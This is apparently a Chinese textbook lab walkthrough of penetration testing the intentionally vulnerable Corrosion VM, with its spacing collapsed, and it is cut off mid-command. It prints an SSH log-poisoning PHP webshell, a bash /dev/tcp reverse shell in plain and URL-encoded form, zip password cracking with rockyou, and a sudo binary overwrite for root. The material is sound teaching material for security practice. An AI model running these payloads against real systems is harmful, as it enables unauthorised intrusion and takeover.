第8章-8.2-Corrosion靶机渗透测试实践

Corrosion靶机渗透测试实践Corrosion靶机渗透测试实践Corrosion是一个专门构建的易受攻击的靶机，目标旨在通过渗透测试获取目标靶机的控制权，进一步对所获取到的权限进行提升。Corrosion靶机的下载地址为：/corrosion/Corrosion.ova渗透目标信息收集漏洞探测任意文件读取漏洞利用权限提升信息收集使用arp-scan探测存活主机输入命令：arp-scan-l信息收集使用Nmap探测开放端口，这里建议使用-P-参数进行全端口探测nmap-sV-p-74信息收集探测到主机开放的端口为22、80，其中22端口所对应服务为ssh服务，80端口所对应服务为http服务。尝试ssh弱口令没有成功，访问80端口的http服务，发现站点首页为Apache2的默认首页。信息收集web目录扫描，这里可以直接使用dirsearch工具。Kali中可以执行以下命令进行安装：sudoapt-getinstalldirsearch安装完成后输入命令进行目录扫描：

dirsearch-uurl–e*

-u参数指定url-e指定探测的目录及文件类型*代表所有本环境的目录不是常规目录名，dirsearch自带的字典探测不到，所以需要切换字典这里使用dirbuster工具的directory-list-2.3-medium.txt字典进行扫描。使用-w参数指定字典文件，命令如下：dirsearch-u74-w/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt扫描发现存blog-post目录，访问存活目录，没有发现更多信息。信息收集进一步进行目录扫描。dirsearch-u74/blog-post-w/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt发现存在archives目录和uploads目录。信息收集渗透目标信息收集漏洞探测任意文件读取漏洞利用权限提升漏洞探测根据上一步信息收集所得到的内容，进行漏洞探测。由于信息探测发现目录中含有一个php文件，可以尝试使用wfuzz工具进行模糊测试测试页面参数。wfuzz不仅仅是一个web扫描器，Wfuzz是一个为暴力破解Web应用程序而设计的工具，它可以用于查找未链接的资源（目录，servlet，脚本等），暴力GET和POST参数以检查不同类型的注入（SQL，XSS，LDAP等），强力表单参数（用户/密码），Fuzzing等。漏洞探测对randylogs.php文件进行FUZZ参数测试，具体命令如下：wfuzz-c-w/usr/share/wfuzz/wordlist/general/medium.txt--hw074/blog-post/archives/randylogs.php?FUZZ=/etc/passwd漏洞探测发现目标页面存在任意文件读取漏洞，可以利用file参数读取/etc/passwd文件中的内容。漏洞探测存在文件包含漏洞，那么就需要配合文件上传漏洞上传木马文件，获取webshell。由于前面探测到目标机器只开放了22,80端口，所以可以从22端口进行突破。由于ssh登录时会将日志记录在/var/log/auth.log。利用文件包含成功读取到/var/log/auth.log文件。渗透目标信息收集漏洞探测任意文件读取漏洞利用权限提升漏洞利用准备PHP一句话webshell。例如：<?phpsystem($_GET["123"]);?>。.然后进行ssh登录，将一句话木马作为登录信息进行登录，这样就会把一句话木马代码写入auth.log文件,命令如下：ssh'<?phpsystem($_GET["123"]);?>'@74漏洞利用通过包含auth.log进行命令执行http://74/blog-post/archives/randylogs.php?file=/var/log/auth.log&123=ifconfig。漏洞利用尝试在目标靶机中写入反弹shell，在KaliLinux监听7777端口，输入nc-lvp7777漏洞利用bash反弹shell命令：bash-c'bash-i>&/dev/tcp/31/77770>&1'进行URL编码bash%20-c%20'bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F31%2F7777%200%3E%261'漏洞利用利用文件包含漏洞继续读取auth.log文件访问:74/blog-post/archives/randylogs.php?file=/var/log/auth.log&123=bash%20-c%20'bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F31%2F7777%200%3E%261'返回nc监听页面，成功建立连接。漏洞利用由于获取到的是www-data权限，需要进一步提权，所以继续探测在/var/backups/目录下发现备份文件user_backup.zip将备份文件利用任意文件读取漏洞下载到kali，具体命令如下：curl74/blog-post/archives/randylogs.php?file=/var/backups/user_backup.zip-ouser_backup.zip。漏洞利用解压user_backup.zip，需要密码使用密码爆破工具对该压缩包密码进行爆破，KaliLinux自带爆破字典位于/usr/share/wordlists/目录下。这里使用rockyou.txt字典文件。漏洞利用漏洞利用rockyou.txt/usr/share/wordlists/目录下带了rockyou的字典。2009年一家名叫rockyou的公司遭到了黑客攻击，他们的密码列表以明文存储，黑客下载了所有的密码列表并且公开。rockyou.txt包含14341564个唯一密码，用于32603388个帐户。rockyou.txt被压缩，需要解压才能够使用解压密码字典文件压缩文件，具体命令如下：gzip-d/usr/share/wordlists/rockyou.txt.gz漏洞利用使用Fcrackzip工具对压缩包密码进行爆破，具体命令如下：fcrackzip-D-p/usr/share/wordlists/rockyou.txt-uuser_backup.zip漏洞利用解压文件，发现压缩包内含有my_password.txt文件，获取文件内密码。漏洞利用从前面的读取到的/etc/passwd中发现存在randy用户，猜测这个密码可能是randy用户的。对目标靶机登录，并登录成功。sshrandy@74渗透目标信息收集漏洞探测任意文件读取漏洞利用权限提升权限提升输入“sudo-l”查看普通用户可以执行的sudo权限在查看可用命令时发现有可以使用普通用户来执行的root权限文件，为easysysinfo，尝试执行该文件。可以发现该文件执行过后会显示easysysinfo.c中的命令权限提升权限提升尝试提权，将获得shell的C文件最后一行修改为“bash-i”，然后进行编译，接着去覆盖easysysinfo文件，覆盖后的文件也将获取和之前文件相同的权限。在kali中利用python启动一个http服务python3-mhttp.server8000让目标主机去下载这个C文件wget31:8000/easysysinfo.c权限提升权限提升删除原先的文件rm-rfeasysysinfo编译该文件gcceasysysinfo.c-oeasys